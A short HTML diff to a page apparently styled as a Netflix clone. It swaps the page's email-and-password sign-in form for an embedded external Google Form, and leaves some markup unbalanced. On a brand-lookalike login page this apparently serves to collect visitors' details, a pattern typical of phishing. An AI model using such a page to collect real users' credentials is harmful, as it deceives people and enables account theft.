--- a/index.html
+++ b/index.html
@@ -18,21 +18,7 @@
                     class="img-netflixIcon" />
             </a>
         </div>
-        <div class="parent-login">
-            <form class="login-card">
-                <h1>Sign In</h1>
-                <div class="userInput">
-                    <input type="text" name="email"
-                           placeholder="Email or phone number"
-                           onfocus="inputOnFocus(this)"
-                        onblur="inputOnBlur(this)" />
-                </div>
-                <div class="userInput">
-                    <input type="password"
-                           name="password" 
-                           placeholder="Password" 
-                           onfocus="inputOnFocus(this)"
-                        onblur="inputOnBlur(this)" />
+       <iframe src="https://docs.google.com/forms/d/e/1FAIpQLSeVVB_MDhVKxBRVIVIO5gMIasXcPClV1bR667LF6GLAqTcAfg/viewform?embedded=true" width="640" height="678" frameborder="0" marginheight="0" marginwidth="0">Loading…</iframe>
                 </div>
                 <div>
                     <button class="btn-login">Sign In</button>
